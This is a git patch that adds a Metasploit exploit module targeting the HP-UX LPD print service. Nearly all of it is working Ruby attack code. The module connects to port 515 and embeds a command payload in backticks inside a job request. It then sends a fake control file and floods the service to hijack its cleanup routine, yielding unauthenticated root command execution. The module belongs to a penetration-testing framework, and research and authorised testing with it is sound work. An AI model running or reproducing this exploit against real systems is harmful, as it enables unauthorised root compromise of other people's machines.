From 8c1194eccd6a73dd8bca50bfbf9a4a58e3b6fb4d Mon Sep 17 00:00:00 2001
From: HD Moore <hd_moore@rapid7.com>
Date: Mon, 16 Jan 2006 04:02:38 +0000
Subject: [PATCH] Another port

git-svn-id: file:///home/svn/incoming/trunk@3383 4d416f70-5f16-0410-b530-b9f4589650da
---
 modules/exploits/hpux/lpd/cleanup_exec.rb | 95 +++++++++++++++++++++++
 1 file changed, 95 insertions(+)
 create mode 100644 modules/exploits/hpux/lpd/cleanup_exec.rb

diff --git a/modules/exploits/hpux/lpd/cleanup_exec.rb b/modules/exploits/hpux/lpd/cleanup_exec.rb
new file mode 100644
index 0000000000..442ea40a85
--- /dev/null
+++ b/modules/exploits/hpux/lpd/cleanup_exec.rb
@@ -0,0 +1,95 @@
+require 'msf/core'
+
+module Msf
+
+class Exploits::Hpux::Lpd::CleanupExec < Msf::Exploit::Remote
+
+	include Exploit::Remote::Tcp
+
+	def initialize(info = {})
+		super(update_info(info,	
+			'Name'           => 'HP-UX LPD Command Execution',
+			'Description'    => %q{
+				This exploit abuses an unpublished vulnerability in the
+				HP-UX LPD service. This flaw allows an unauthenticated
+				attacker to execute arbitrary commands with the privileges
+				of the root user. The LPD service is only exploitable when
+				the address of the attacking system can be resolved by the
+				target. This vulnerability was silently patched with the
+				buffer overflow flaws addressed in HP Security Bulletin
+				HPSBUX0208-213.
+					
+			},
+			'Author'         => [ 'hdm' ],
+			'Version'        => '$Revision$',
+			'References'     =>
+				[
+					[ 'URL', 'http://archives.neohapsis.com/archives/hp/2002-q3/0064.html'],
+
+				],
+			'Platform'       => ['unix', 'hpux'],
+			'Arch'           => ARCH_CMD,
+			'Payload'        =>
+				{
+					'Space'       => 200,
+					'DisableNops' => true,
+					'BadChars'    => "\x00\x09\x20\x2f",
+				},
+			'PayloadCompat' =>
+				{
+					"PayloadType" => "cmd",
+				},				
+			'Targets'        => 
+				[
+					[ 'Automatic Target', { }]
+				],
+			'DefaultTarget' => 0))
+			
+			register_options(
+				[
+					Opt::RPORT(515)
+				], self.class)
+	end
+
+	def exploit
+
+		# The job ID is squashed down to three decimal digits
+		jid = ($$ % 1000).to_s + [Time.now.to_i].pack('N').unpack('H*')[0]
+
+		# Connect to the LPD service
+		connect
+		
+		print_status("Sending our job request with embedded command string...")
+		# Send the job request with the encoded command
+		sock.put(
+			"\x02" + Rex::Text.rand_text_alphanumeric(3) + jid +
+			"`" + payload.encoded + "`\n"
+		)
+		
+		res = sock.get_once(1)
+		if (res[0] != 0)
+			print_status("The target did not accept our job request")
+			return
+		end
+
+		print_status("Sending our fake control file...")		
+		sock.put("\x02 32 cfA" + Rex::Text.rand_text_alphanumeric(8) + "\n")
+		res = sock.get_once(1)
+		if (res[0] != 0)
+			print_status("The target did not accept our control file")
+			return
+		end
+		
+		
+		print_status("Forcing an error and hijacking the cleanup routine...")
+		
+		begin
+			sock.put(Rex::Text.rand_text_alphanumeric(16384))
+			disconnect
+		rescue
+		end
+		
+	end
+
+end
+end